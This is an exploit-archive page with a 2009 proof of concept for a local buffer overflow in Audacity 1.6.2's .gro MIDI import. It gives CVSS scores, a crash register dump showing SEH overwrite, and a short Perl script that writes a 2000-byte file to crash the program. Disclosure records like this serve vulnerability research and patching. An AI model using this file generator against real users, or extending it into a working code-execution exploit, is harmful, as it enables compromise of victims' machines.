Audacity 1.6.2 (.gro File) Local Buffer Overflow PoC

2009.02.10
Credit: Houssamix
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# ----------------------------------------------------------- # Author : Houssamix # ----------------------------------------------------------- # Audacity 1.6.2 (.gro file ) Local buffer overflow POC # download : http://audacity.sourceforge.net/ # Audacity® is free, open source software for recording and editing sounds. # Description: # When we select : project > import midi.. and we import ".gro" file contains long Chars # The Program Will crash and The Following Happen: # EAX:05050504 ECX:01414141 EDX:01520608 EBX:0012F154 # ESP:0012EF10 EBP:00000000 ESI:41414141 EDI:00000000 # EIP:006AEC54 audacity.006AEC54 # Access violation When Reading [41414141] # And Also The Pointer to next SEH record and SE Handler Will gonna BE Over-wrote # Poc : # -------------------------------------------------------- #!/usr/bin/perl #[*] Bug : Audacity 1.6.2 (.gro file ) Local buffer overflow use warnings; use strict; my $chars = "\x41" x 2000 ; my $file="hsmx.gro"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file has been created . import it in audacity \n"; # ----------------------------------------------------------

References:

http://www.securityfocus.com/bid/33090
http://www.milw0rm.com/exploits/7634
http://www.frsirt.com/english/advisories/2009/0008
http://secunia.com/advisories/33356
http://osvdb.org/51070
http://n2.nabble.com/Audacity-%22String_parse::get_nonspace_quoted()%22-Buffer-Overflow-td2139537.html
http://bugs.gentoo.org/show_bug.cgi?id=253493


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top